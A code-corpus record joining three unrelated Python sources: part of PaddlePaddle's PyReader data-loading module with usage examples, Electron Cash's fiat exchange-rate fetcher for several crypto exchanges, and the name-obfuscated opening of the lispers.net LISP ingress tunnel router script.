reader, batch_size=batch_size, drop_last=drop_last),
places=places)
else:
reader = BatchedTensorProvider(
feed_list=self._feed_list,
place=core.CPUPlace(),
batch_size=batch_size,
generator=reader,
drop_last=drop_last)
self.set_batch_generator(reader, places=places)
return self
def set_sample_list_generator(self, reader, places=None):
with program_guard(Program(), Program()):
feeder = DataFeeder(
feed_list=self._feed_list, place=core.CPUPlace())
paddle_reader = feeder.decorate_reader(reader, multi_devices=False)
def __tensor_reader_impl__():
for slots in paddle_reader():
yield [slots[var.name] for var in self._feed_list]
self.set_batch_generator(__tensor_reader_impl__, places)
return self
def set_batch_generator(self, reader, places=None):
self._tensor_reader = reader
if self._iterable:
assert places is not None, "Places cannot be None when DataLoader is iterable"
self._places = _convert_places(places)
else:
if places is not None:
logging.info(
'places would be ommited when DataLoader is not iterable')
return self
class PyReader(DataLoaderBase):
"""
Create a reader object for data feeding in Python.
Data would be prefetched using Python thread and be pushed
into a queue asynchronously. Data in the queue would be extracted
automatically when `Executor.run(...)` is called.
Args:
feed_list (list(Variable)|tuple(Variable)): feed variable list.
The variables should be created by :code:`fluid.layers.data()`.
capacity (int): capacity of the queue maintained in PyReader.
The unit is batch number. Set larger capacity if your reader
is fast.
use_double_buffer (bool): whether to use double_buffer_reader.
If use_double_buffer=True, PyReader would prefetch next
batch data asynchronously, so it would speed up data feeding
and occupies a little more CPU or GPU memory, i.e., the memory
of one batch input data.
iterable (bool): whether the created PyReader is iterable.
return_list (bool): whether the return value on each device is
presented as a list. It is only valid when iterable=True.
If return_list=False, the return value on each device would
be a dict of str -> LoDTensor, where the key of the dict is
the name of each fed variables. If return_list=True, the
return value on each device would be a list(LoDTensor). It is
recommended to use return_list=False in static graph mode and
use return_list=True in dygraph mode.
Returns:
the created reader object.
Return type:
reader(Reader)
Examples:
1. If iterable = False, the created PyReader object is almost the
same as :code:`fluid.layers.py_reader()`. Operators would be
inserted into the program. User should call :code:`start()`
before each epoch and catch :code:`fluid.core.EOFException`
thrown by :code:`Executor.run()` when epoch ends. Once the
exception is caught, user should call :code:`reset()` to reset
the reader manually.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image_and_label(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label],
capacity=4,
iterable=False)
user_defined_reader = reader_creator_random_image_and_label(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE))
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(EPOCH_NUM):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
2. If iterable=True, the created PyReader object is decoupled with
the program. No operator would be inserted into the program.
In this case, the created reader is a Python generator, which
is iterable. User should feed the data yielded from PyReader
object into :code:`Executor.run(feed=...)`.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 5
BATCH_SIZE = 10
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0, high=255, size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return reader
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True, return_list=False)
user_defined_reader = reader_creator_random_image(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
3. If return_list=True, the return values would be presented as list instead of dict.
This is usually used in dygraph mode.
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
ITER_NUM = 5
BATCH_SIZE = 10
def reader_creator_random_image(height, width):
def reader():
for i in range(ITER_NUM):
yield np.random.uniform(low=0, high=255, size=[height, width]), \
np.random.random_integers(low=0, high=9, size=[1])
return reader
place = fluid.CPUPlace()
with fluid.dygraph.guard(place):
py_reader = fluid.io.PyReader(capacity=2, return_list=True)
user_defined_reader = reader_creator_random_image(784, 784)
py_reader.decorate_sample_list_generator(
paddle.batch(user_defined_reader, batch_size=BATCH_SIZE),
place)
for image, label in py_reader():
relu = fluid.layers.relu(image)
"""
def __init__(self,
feed_list=None,
capacity=None,
use_double_buffer=True,
iterable=True,
return_list=False):
self._loader = DataLoader.from_generator(
feed_list, capacity, use_double_buffer, iterable, return_list)
@property
def queue(self):
return self._loader.queue
@property
def iterable(self):
return self._loader.iterable
def __iter__(self):
return self._loader.__iter__()
def __next__(self):
return self._loader.__next__()
def start(self):
'''
Start the data feeding thread.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.start()
def reset(self):
'''
Reset the reader object when :code:`fluid.core.EOFException` raises.
Can only call when the reader object is not iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
BATCH_SIZE = 10
def generator():
for i in range(5):
yield np.random.uniform(low=0, high=255, size=[784, 784]),
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
reader = fluid.io.PyReader(feed_list=[image], capacity=4, iterable=False)
reader.decorate_sample_list_generator(
paddle.batch(generator, batch_size=BATCH_SIZE))
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for i in range(3):
reader.start()
while True:
try:
executor.run(feed=None)
except fluid.core.EOFException:
reader.reset()
break
'''
self._loader.reset()
def decorate_sample_generator(self,
sample_generator,
batch_size,
drop_last=True,
places=None):
'''
Set the data source of the PyReader object.
The provided :code:`sample_generator` should be a Python generator,
which yields list(numpy.ndarray)-typed data of each sample.
:code:`places` must be set when the PyReader object is iterable.
If all inputs have no lods, this method is faster than
:code:`decorate_sample_list_generator(paddle.batch(sample_generator, ...))` .
Args:
sample_generator (generator): Python generator that yields
list(numpy.ndarray)-typed sample data.
batch_size (int): batch size. Must be larger than 0.
drop_last (bool): Whether to drop the last batch when sample number
is less than batch_size.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.array([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_generator(user_defined_generator,
batch_size=BATCH_SIZE,
places=[fluid.CPUPlace()])
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_generator(sample_generator, batch_size,
drop_last, places)
def decorate_sample_list_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields list(numpy.ndarray) typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields
list(numpy.ndarray)-typed batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
fake_image = np.random.uniform(low=0,
high=255,
size=[height, width])
fake_label = np.ones([1])
yield fake_image, fake_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_sample_list_generator(
paddle.batch(user_defined_generator, batch_size=BATCH_SIZE),
fluid.core.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.core.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_sample_list_generator(reader, places)
def decorate_batch_generator(self, reader, places=None):
'''
Set the data source of the PyReader object.
The provided :code:`reader` should be a Python generator,
which yields numpy.ndarray-typed or LoDTensor-typed batched data.
:code:`places` must be set when the PyReader object is iterable.
Args:
reader (generator): Python generator that yields LoDTensor-typed
batched data.
places (None|list(CUDAPlace)|list(CPUPlace)): place list. Must
be provided when PyReader is iterable.
Example:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
EPOCH_NUM = 3
ITER_NUM = 15
BATCH_SIZE = 3
def network(image, label):
# User-defined network, here is an example of softmax regression.
predict = fluid.layers.fc(input=image, size=10, act='softmax')
return fluid.layers.cross_entropy(input=predict, label=label)
def random_image_and_label_generator(height, width):
def generator():
for i in range(ITER_NUM):
batch_image = np.random.uniform(low=0,
high=255,
size=[BATCH_SIZE, height, width])
batch_label = np.ones([BATCH_SIZE, 1])
batch_image = batch_image.astype('float32')
batch_label = batch_label.astype('int64')
yield batch_image, batch_label
return generator
image = fluid.data(name='image', shape=[None, 784, 784], dtype='float32')
label = fluid.data(name='label', shape=[None, 1], dtype='int64')
reader = fluid.io.PyReader(feed_list=[image, label], capacity=4, iterable=True)
user_defined_generator = random_image_and_label_generator(784, 784)
reader.decorate_batch_generator(user_defined_generator, fluid.CPUPlace())
loss = network(image, label)
executor = fluid.Executor(fluid.CPUPlace())
executor.run(fluid.default_startup_program())
for _ in range(EPOCH_NUM):
for data in reader():
executor.run(feed=data, fetch_list=[loss])
'''
self._loader.set_batch_generator(reader, places)
class DatasetLoader(DataLoaderBase):
def __init__(self, dataset, places, drop_last):
assert isinstance(dataset, paddle.distributed.fleet.dataset.
DatasetBase), "dataset must be type of DatasetBase"
assert not in_dygraph_mode(
), "DatasetLoader is not supported in dygraph mode yet"
thread_num = len(places)
assert len(dataset.filelist) >= thread_num, \
"Filelist number of dataset {} must be not less than place number {}".format(len(dataset.filelist), thread_num)
if dataset.thread_num != 0 and dataset.thread_num != thread_num:
logging.warn('thread_num {} which is set in Dataset is ignored'.
format(dataset.thread_num))
dataset._set_thread(thread_num)
if isinstance(dataset, paddle.distributed.fleet.dataset.
InMemoryDataset) and dataset.queue_num > thread_num:
logging.warn("queue_num {} which is set in Dataset is ignored".
format(dataset.queue_num))
dataset._set_queue_num(thread_num)
self._dataset = dataset
use_slots = [
slot.name for slot in dataset.proto_desc.multi_slot_desc.slots
if slot.is_used
]
self._iterable_dataset = core.IterableDatasetWrapper(
dataset.dataset, use_slots,
_convert_places(places), dataset.proto_desc.batch_size, drop_last)
def __iter__(self):
self._dataset._finish_to_run()
self._dataset._prepare_to_run()
self._iterable_dataset._start()
return self
def __next__(self):
return self._iterable_dataset._next()
|
exchange_rate.py | from datetime import datetime
import inspect
import requests
import sys
import os
import json
from threading import Thread
import time
import csv
import decimal
from decimal import Decimal
from .bitcoin import COIN
from .i18n import _
from .util import PrintError, ThreadJob
# See https://en.wikipedia.org/wiki/ISO_4217
CCY_PRECISIONS = {'BHD': 3, 'BIF': 0, 'BYR': 0, 'CLF': 4, 'CLP': 0,
'CVE': 0, 'DJF': 0, 'GNF': 0, 'IQD': 3, 'ISK': 0,
'JOD': 3, 'JPY': 0, 'KMF': 0, 'KRW': 0, 'KWD': 3,
'LYD': 3, 'MGA': 1, 'MRO': 1, 'OMR': 3, 'PYG': 0,
'RWF': 0, 'TND': 3, 'UGX': 0, 'UYI': 0, 'VND': 0,
'VUV': 0, 'XAF': 0, 'XAU': 4, 'XOF': 0, 'XPF': 0}
class ExchangeBase(PrintError):
    """Base class for fiat exchange-rate providers.

    Subclasses implement get_rates() and, when they offer history,
    history_ccys() / request_history().  Quote and history fetches run on
    daemon threads and report completion via the on_quotes / on_history
    callbacks.
    """

    def __init__(self, on_quotes, on_history):
        self.history = {}   # ccy -> {'YYYY-MM-DD': rate}
        self.quotes = {}    # ccy -> spot rate
        self.on_quotes = on_quotes
        self.on_history = on_history

    def get_json(self, site, get_string):
        """GET https://<site><get_string> and return the decoded JSON body."""
        # APIs must have https
        url = ''.join(['https://', site, get_string])
        response = requests.request('GET', url,
                                    headers={'User-Agent': 'Electron Cash'},
                                    timeout=10)
        return response.json()

    def get_csv(self, site, get_string):
        """GET https://<site><get_string> and return csv.DictReader rows."""
        url = ''.join(['https://', site, get_string])
        response = requests.request('GET', url,
                                    headers={'User-Agent': 'Electron-Cash'})
        reader = csv.DictReader(response.content.decode().split('\n'))
        return list(reader)

    def name(self):
        return self.__class__.__name__

    def update_safe(self, ccy):
        """Fetch spot quotes for ccy; never propagates exceptions."""
        try:
            self.print_error("getting fx quotes for", ccy)
            self.quotes = self.get_rates(ccy)
            self.print_error("received fx quotes")
        except BaseException as e:
            # Deliberately broad: a failed fetch must never kill the thread.
            self.print_error("failed fx quotes:", e)
        self.on_quotes()

    def update(self, ccy):
        """Kick off an asynchronous spot-quote refresh."""
        t = Thread(target=self.update_safe, args=(ccy,), daemon=True)
        t.start()

    def read_historical_rates(self, ccy, cache_dir):
        """Load cached history for ccy.

        Returns (history, file_mtime), or (None, False) when there is no
        usable cache file.
        """
        filename = os.path.join(cache_dir, self.name() + '_' + ccy)
        if os.path.exists(filename):
            timestamp = os.stat(filename).st_mtime
            try:
                with open(filename, 'r', encoding='utf-8') as f:
                    h = json.loads(f.read())
            except Exception:
                # Corrupt/unreadable cache: treat as missing.
                h = None
        else:
            h = None
            timestamp = False
        if h:
            self.history[ccy] = h
            self.on_history()
        return h, timestamp

    def get_historical_rates_safe(self, ccy, cache_dir):
        h, timestamp = self.read_historical_rates(ccy, cache_dir)
        # BUG FIX: refresh when the cache is missing or STALE (older than
        # 24h).  The original '<' comparison re-downloaded fresh caches and
        # served stale ones forever.
        if h is None or time.time() - timestamp > 24*3600:
            try:
                self.print_error("requesting fx history for", ccy)
                h = self.request_history(ccy)
                self.print_error("received fx history for", ccy)
                self.on_history()
            except BaseException as e:
                self.print_error("failed fx history:", e)
                return
            filename = os.path.join(cache_dir, self.name() + '_' + ccy)
            with open(filename, 'w', encoding='utf-8') as f:
                f.write(json.dumps(h))
        self.history[ccy] = h
        self.on_history()

    def get_historical_rates(self, ccy, cache_dir):
        """Return cached history for ccy, fetching asynchronously if absent."""
        result = self.history.get(ccy)
        if not result and ccy in self.history_ccys():
            t = Thread(target=self.get_historical_rates_safe,
                       args=(ccy, cache_dir), daemon=True)
            t.start()
        return result

    def history_ccys(self):
        """Currencies with history support; overridden by subclasses."""
        return []

    def historical_rate(self, ccy, d_t):
        return self.history.get(ccy, {}).get(d_t.strftime('%Y-%m-%d'))

    def get_currencies(self):
        """Probe the exchange for its 3-letter quote currencies."""
        rates = self.get_rates('')
        return sorted([str(a) for (a, b) in rates.items()
                       if b is not None and len(a) == 3])
class BitcoinAverage(ExchangeBase):
    """BitcoinAverage global BCH index (spot plus all-time daily history)."""

    def get_rates(self, ccy):
        # Renamed the local from 'json' so it no longer shadows the imported
        # json module.
        rates = self.get_json('apiv2.bitcoinaverage.com',
                              '/indices/global/ticker/short')
        # Keys look like 'BCHUSD'; strip the BCH prefix, skip 'timestamp'.
        return dict([(r.replace("BCH", ""), Decimal(rates[r]['last']))
                     for r in rates if r != 'timestamp'])

    def history_ccys(self):
        return ['AUD', 'BRL', 'CAD', 'CHF', 'CNY', 'EUR', 'GBP', 'IDR', 'ILS',
                'MXN', 'NOK', 'NZD', 'PLN', 'RON', 'RUB', 'SEK', 'SGD', 'USD',
                'ZAR']

    def request_history(self, ccy):
        history = self.get_csv('apiv2.bitcoinaverage.com',
            "/indices/global/history/BCH%s?period=alltime&format=csv" % ccy)
        # Truncate DateTime to its YYYY-MM-DD prefix.
        return dict([(h['DateTime'][:10], h['Average'])
                     for h in history])
class Bitmarket(ExchangeBase):
    """bitmarket.pl BCC/PLN ticker."""

    def get_rates(self, ccy):
        # Renamed the local from 'json' to avoid shadowing the json module.
        ticker = self.get_json('www.bitmarket.pl', '/json/BCCPLN/ticker.json')
        return {'PLN': Decimal(ticker['last'])}
class BitPay(ExchangeBase):
    """BitPay consolidated BCH rate table."""

    def get_rates(self, ccy):
        # Renamed the local from 'json' to avoid shadowing the json module.
        rates = self.get_json('bitpay.com', '/api/rates/BCH')
        return dict([(r['code'], Decimal(r['rate'])) for r in rates])
class Bitso(ExchangeBase):
    """Bitso BCH/BTC ticker (BTC rate only)."""

    def get_rates(self, ccy):
        # Renamed the local from 'json' to avoid shadowing the json module.
        ticker = self.get_json('api.bitso.com', '/v2/ticker/?book=bch_btc')
        return {'BTC': Decimal(ticker['last'])}
class BitStamp(ExchangeBase):
    """Bitstamp BCH tickers for USD, EUR and BTC."""

    def get_rates(self, ccy):
        # One ticker request per quote currency, in a fixed order.
        rates = {}
        for code, pair in (('USD', 'bchusd'),
                           ('EUR', 'bcheur'),
                           ('BTC', 'bchbtc')):
            ticker = self.get_json('www.bitstamp.net', '/api/v2/ticker/' + pair)
            rates[code] = Decimal(ticker['last'])
        return rates
class Coinbase(ExchangeBase):
    """Coinbase exchange-rate table, filtered to bch_to_* entries."""

    def get_rates(self, ccy):
        # Renamed the local from 'json' to avoid shadowing the json module.
        rates = self.get_json('coinbase.com',
                              '/api/v1/currencies/exchange_rates')
        # Keys look like 'bch_to_usd'; drop the 7-character 'bch_to_' prefix.
        return dict([(r[7:].upper(), Decimal(rates[r]))
                     for r in rates if r.startswith('bch_to_')])
class Kraken(ExchangeBase):
    """Kraken BCH tickers for EUR and USD."""

    def get_rates(self, ccy):
        ccys = ['EUR', 'USD']
        pairs = ['BCH%s' % c for c in ccys]
        # Renamed the local from 'json' to avoid shadowing the json module.
        resp = self.get_json('api.kraken.com',
                             '/0/public/Ticker?pair=%s' % ','.join(pairs))
        # Pass the API's decimal string straight to Decimal; the original
        # round-tripped through float and picked up binary-float error.
        return dict((k[-3:], Decimal(v['c'][0]))
                    for k, v in resp['result'].items())
class CoinFloor(ExchangeBase):
    """Coinfloor BCH/GBP ticker (the public API only supports GBP)."""

    def get_rates(self, ccy):
        # Renamed the local from 'json' to avoid shadowing the json module.
        ticker = self.get_json('webapi.coinfloor.co.uk:8090/bist/BCH/GBP',
                               '/ticker/')
        return {'GBP': Decimal(ticker['last'])}
class WEX(ExchangeBase):
    """wex.nz BCH tickers across several quote currencies."""

    def get_rates(self, ccy):
        rates = {}
        # (returned code, wex pair name); note RUB maps to 'bch_rur' on WEX.
        for code, pair in (('EUR', 'bch_eur'), ('RUB', 'bch_rur'),
                           ('USD', 'bch_usd'), ('BTC', 'bch_btc'),
                           ('LTC', 'bch_ltc'), ('ETH', 'bch_eth'),
                           ('DSH', 'bch_dsh')):
            ticker = self.get_json('wex.nz', '/api/3/ticker/' + pair)
            rates[code] = Decimal(ticker[pair]['last'])
        return rates
def dictinvert(d):
    """Invert a dict of lists: {k: [v, ...]} -> {v: [k, ...]}.

    Each inverted value-list holds the original keys in the iteration
    order of d.
    """
    inverted = {}
    for key, values in d.items():
        for value in values:
            if value not in inverted:
                inverted[value] = []
            inverted[value].append(key)
    return inverted
def get_exchanges_and_currencies():
    """Return {exchange_name: [ccy, ...]}, cached in currencies.json.

    If the cache file is missing or unreadable, every ExchangeBase subclass
    defined in this module is polled for its currency list and the result
    is written back to currencies.json.
    """
    import os, json
    path = os.path.join(os.path.dirname(__file__), 'currencies.json')
    try:
        with open(path, 'r', encoding='utf-8') as f:
            return json.loads(f.read())
    except Exception:
        # Missing or corrupt cache: fall through and rebuild it.
        # (Narrowed from a bare except, which also swallowed
        # KeyboardInterrupt/SystemExit.)
        pass
    d = {}
    is_exchange = lambda obj: (inspect.isclass(obj)
                               and issubclass(obj, ExchangeBase)
                               and obj != ExchangeBase)
    exchanges = dict(inspect.getmembers(sys.modules[__name__], is_exchange))
    for name, klass in exchanges.items():
        exchange = klass(None, None)
        try:
            d[name] = exchange.get_currencies()
            print(name, "ok")
        except Exception:
            # A network/API failure for one exchange must not abort the scan.
            print(name, "error")
            continue
    with open(path, 'w', encoding='utf-8') as f:
        f.write(json.dumps(d, indent=4, sort_keys=True))
    return d
# Module-level snapshot of {exchange: [ccy, ...]}, loaded (or rebuilt from
# the live APIs) once at import time.
CURRENCIES = get_exchanges_and_currencies()
def get_exchanges_by_ccy(history=True):
    """Map each currency code to the exchanges that support it.

    With history=True only history-capable currencies are considered;
    otherwise the full spot-currency table is inverted.
    """
    if not history:
        return dictinvert(CURRENCIES)
    per_exchange = {name: globals()[name](None, None).history_ccys()
                    for name in CURRENCIES.keys()}
    return dictinvert(per_exchange)
class FxThread(ThreadJob):
    """Background job that keeps fiat exchange rates up to date.

    Owns the active exchange object, persists user choices in the config,
    and relays quote/history updates through the network callbacks.
    """

    def __init__(self, config, network):
        self.config = config
        self.network = network
        self.ccy = self.get_currency()
        self.history_used_spot = False
        self.ccy_combo = None
        self.hist_checkbox = None
        self.cache_dir = os.path.join(config.path, 'cache')
        self.set_exchange(self.config_exchange())
        # makedirs(exist_ok=True) avoids the exists()/mkdir() TOCTOU race of
        # the original code and tolerates concurrent creation.
        os.makedirs(self.cache_dir, exist_ok=True)

    def get_currencies(self, h):
        """Sorted currency codes (history-capable only when h is true)."""
        d = get_exchanges_by_ccy(h)
        return sorted(d.keys())

    def get_exchanges_by_ccy(self, ccy, h):
        """Exchanges supporting ccy (history-capable only when h is true)."""
        d = get_exchanges_by_ccy(h)
        return d.get(ccy, [])

    def ccy_amount_str(self, amount, commas, default_prec=2):
        """Format a fiat amount using the per-currency decimal precision."""
        prec = CCY_PRECISIONS.get(self.ccy, default_prec)
        fmt_str = "{:%s.%df}" % ("," if commas else "", max(0, prec))
        try:
            rounded_amount = round(amount, prec)
        except decimal.InvalidOperation:
            # e.g. NaN cannot be rounded; format the raw value instead.
            rounded_amount = amount
        return fmt_str.format(rounded_amount)

    def run(self):
        # This runs from the plugins thread which catches exceptions
        if self.is_enabled():
            if self.timeout == 0 and self.show_history():
                self.exchange.get_historical_rates(self.ccy, self.cache_dir)
            if self.timeout <= time.time():
                # Refresh spot quotes every 150 seconds.
                self.timeout = time.time() + 150
                self.exchange.update(self.ccy)

    def is_enabled(self):
        return bool(self.config.get('use_exchange_rate'))

    def set_enabled(self, b):
        return self.config.set_key('use_exchange_rate', bool(b))

    def get_history_config(self):
        return bool(self.config.get('history_rates'))

    def set_history_config(self, b):
        self.config.set_key('history_rates', bool(b))

    def get_fiat_address_config(self):
        return bool(self.config.get('fiat_address'))

    def set_fiat_address_config(self, b):
        self.config.set_key('fiat_address', bool(b))

    def get_currency(self):
        '''Use when dynamic fetching is needed'''
        return self.config.get("currency", "EUR")

    def config_exchange(self):
        return self.config.get('use_exchange', 'Kraken')

    def show_history(self):
        return (self.is_enabled() and self.get_history_config()
                and self.ccy in self.exchange.history_ccys())

    def set_currency(self, ccy):
        self.ccy = ccy
        self.config.set_key('currency', ccy, True)
        self.timeout = 0  # Because self.ccy changes
        self.on_quotes()

    def set_exchange(self, name):
        # Fall back to Kraken when the configured name is unknown.
        class_ = globals().get(name, Kraken)
        self.print_error("using exchange", name)
        if self.config_exchange() != name:
            self.config.set_key('use_exchange', name, True)
        self.exchange = class_(self.on_quotes, self.on_history)
        # A new exchange means new fx quotes, initially empty.  Force
        # a quote refresh
        self.timeout = 0
        self.exchange.read_historical_rates(self.ccy, self.cache_dir)

    def on_quotes(self):
        if self.network:
            self.network.trigger_callback('on_quotes')

    def on_history(self):
        if self.network:
            self.network.trigger_callback('on_history')

    def exchange_rate(self):
        '''Returns None, or the exchange rate as a Decimal'''
        rate = self.exchange.quotes.get(self.ccy)
        if rate:
            return Decimal(rate)

    def format_amount_and_units(self, btc_balance):
        rate = self.exchange_rate()
        return '' if rate is None else "%s %s" % (
            self.value_str(btc_balance, rate), self.ccy)

    def get_fiat_status_text(self, btc_balance, base_unit, decimal_point):
        rate = self.exchange_rate()
        default_prec = 2
        # The 'cash' unit is much smaller, so show extra fiat decimals.
        if base_unit == "cash":
            default_prec = 4
        return _(" (No FX rate available)") if rate is None else \
            " 1 %s~%s %s" % (base_unit,
                             self.value_str(COIN / (10**(8 - decimal_point)),
                                            rate, default_prec),
                             self.ccy)

    def value_str(self, satoshis, rate, default_prec=2):
        if satoshis is None:  # Can happen with incomplete history
            return _("Unknown")
        if rate:
            value = Decimal(satoshis) / COIN * Decimal(rate)
            return "%s" % (self.ccy_amount_str(value, True, default_prec))
        return _("No data")

    def history_rate(self, d_t):
        rate = self.exchange.historical_rate(self.ccy, d_t)
        # Frequently there is no rate for today, until tomorrow :)
        # Use spot quotes in that case
        if rate is None and (datetime.today().date() - d_t.date()).days <= 2:
            rate = self.exchange.quotes.get(self.ccy)
            self.history_used_spot = True
        return Decimal(rate) if rate is not None else None

    def historical_value_str(self, satoshis, d_t):
        rate = self.history_rate(d_t)
        return self.value_str(satoshis, rate)

    def historical_value(self, satoshis, d_t):
        rate = self.history_rate(d_t)
        if rate:
            return Decimal(satoshis) / COIN * Decimal(rate)

    def timestamp_rate(self, timestamp):
        from .util import timestamp_to_datetime
        date = timestamp_to_datetime(timestamp)
        return self.history_rate(date)
|
lisp-itr.py | # -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp-itr.py
#
# This file performs LISP Ingress Tunnel Router (ITR) functionality.
#
# -----------------------------------------------------------------------------
if 64 - 64: i11iIiiIii
import lisp
import lispconfig
import socket
import select
import threading
import pcappy
import time
import os
import commands
import struct
if 65 - 65: O0 / iIii1I11I1II1 % OoooooooOO - i1IIi
if 73 - 73: II111iiii
if 22 - 22: I1IiiI * Oo0Ooo / OoO0O00 . OoOoOO00 . o0oOOo0O0Ooo / I1ii11iIi11i
if 48 - 48: oO0o / OOooOOo / I11i / Ii1I
if 48 - 48: iII111i % IiII + I1Ii111 / ooOoO0o * Ii1I
if 46 - 46: ooOoO0o * I11i - OoooooooOO
# Obfuscated module-level state for the ITR process (names are machine-
# generated).  The `if N - N:` lines are never-executed obfuscator filler.
II1iII1i = [ None , None , None ]   # send sockets: [IPv4, IPv6, "lisp-itr" IPC]
oO0oIIII = None                     # "lisp-itr" IPC listen socket
Oo0oO0oo0oO00 = None                # "lispers.net-itr" IPC listen socket
i111I = None                        # listen socket bound to port iiI1iIiI
II1Ii1iI1i = None                   # listen socket bound to port OOo
iiI1iIiI = lisp . lisp_get_ephemeral_port ( )   # first ephemeral port
OOo = lisp . lisp_get_ephemeral_port ( )        # second ephemeral port
Ii1IIii11 = None                    # raw IPv4 socket, created at startup
Oooo0000 = None                     # raw IPv6 socket, created at startup
i11 = None                          # periodic housekeeping threading.Timer
I11 = None                          # timer cancelled on shutdown -- presumably set elsewhere; TODO confirm
if 98 - 98: i11iIiiIii * I1IiiI % iII111i * iII111i * II111iiii
if 79 - 79: IiII
if 86 - 86: OoOoOO00 % I1IiiI
if 80 - 80: OoooooooOO . I1IiiI
if 87 - 87: oO0o / ooOoO0o + I1Ii111 - ooOoO0o . ooOoO0o / II111iiii
if 11 - 11: I1IiiI % o0oOOo0O0Ooo - Oo0Ooo
oo0O000OoO = False                  # unused in this chunk -- presumably a flag; TODO confirm
if 34 - 34: I11i * I1IiiI
if 31 - 31: II111iiii + OoO0O00 . I1Ii111
if 68 - 68: I1IiiI - i11iIiiIii - OoO0O00 / OOooOOo - OoO0O00 + i1IIi
